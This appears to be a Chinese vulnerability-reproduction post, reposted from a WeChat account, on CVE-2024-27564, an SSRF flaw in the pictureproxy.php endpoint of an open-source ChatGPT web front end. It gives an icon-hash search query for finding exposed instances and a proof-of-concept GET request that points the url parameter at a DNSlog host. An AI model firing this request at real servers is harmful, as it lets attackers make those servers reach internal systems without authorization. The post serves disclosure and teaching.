一:漏洞描述
ChatGPT pictureproxy.php SSRF漏洞
ChatGPT是由OpenAI开发的基于Transformer架构的大型神经网络模型,旨在处理自然语言处理任务,实现对话生成、文本摘要和语言翻译等功能。该模型通过大规模文本数据集学习语言知识和语境,能够自然流畅地与用户对话,并在多个领域发挥作用。
该产品的pictureproxy.php 接口处没有对url参数进行校验,攻击者可以通过url参数注入任意URL让应用发出任意请求。
二:漏洞影响版本
ChatGPT开源地址:https://github.com/dirk1983/chatgpt
ChatGPT
三:网络空间测绘查询
icon_hash=
"-1999760920"
四:漏洞复现
POC:
GET
/pictureproxy.php?url=http://[DNSlog]
HTTP/1.1
Host
:
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language
: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding
: gzip, deflate, br
Connection
: close
Upgrade-Insecure-Requests: 1
SSRF漏洞复现通常使用DNSlog方式
服务器端请求伪造(Server-Side Request Forgery,SSRF)是一种安全漏洞,通常出现在允许用户提供URL并对其进行处理的地方,比如像图片上传、URL预览或其他外部资源加载的功能。攻击者可以利用这些功能,构造恶意的URL,使服务器发起对内部系统、本地文件或其他未授权的网络位置的请求。
使用DNSlog生成一个域名,替换POC中【DNSLog】内容
五:批量检测
建议更新当前系统或软件至最新版,完成漏洞的修复。
原文始发于微信公众号(Adler学安全):漏洞复现-CVE-2024-27564
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论